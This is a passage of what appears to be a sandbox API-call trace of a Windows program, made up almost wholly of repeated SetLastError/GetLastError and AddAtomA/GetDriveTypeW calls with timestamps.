returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.373] GetLastError () returned 0x0 [0099.373] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.374] SetLastError (dwErrCode=0x0) [0099.374] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () 
returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.375] SetLastError (dwErrCode=0x0) [0099.375] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.376] SetLastError (dwErrCode=0x0) [0099.376] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () 
returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.377] SetLastError (dwErrCode=0x0) [0099.377] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () 
returned 0x0 [0099.378] SetLastError (dwErrCode=0x0) [0099.378] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.379] SetLastError (dwErrCode=0x0) [0099.379] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () 
returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.380] GetLastError () returned 0x0 [0099.380] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.381] GetLastError () returned 0x0 [0099.381] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () 
returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.382] SetLastError (dwErrCode=0x0) [0099.382] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.383] GetLastError () returned 0x0 [0099.383] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () 
returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.384] GetLastError () returned 0x0 [0099.384] SetLastError (dwErrCode=0x0) [0099.385] GetLastError () returned 0x0 [0099.385] SetLastError (dwErrCode=0x0) [0099.385] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0099.385] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0099.385] LoadLibraryW (lpLibFileName="dfgdfgdfg.exe") returned 0x0 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.386] AddAtomA (lpString=0x0) returned 0x0 [0099.386] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) 
returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.387] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.387] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.388] AddAtomA (lpString=0x0) returned 0x0 [0099.388] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.389] AddAtomA (lpString=0x0) returned 0x0 [0099.389] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) 
returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.390] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.390] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.391] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.391] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.392] AddAtomA (lpString=0x0) returned 0x0 [0099.392] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) 
returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] AddAtomA (lpString=0x0) returned 0x0 [0099.393] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0099.393] 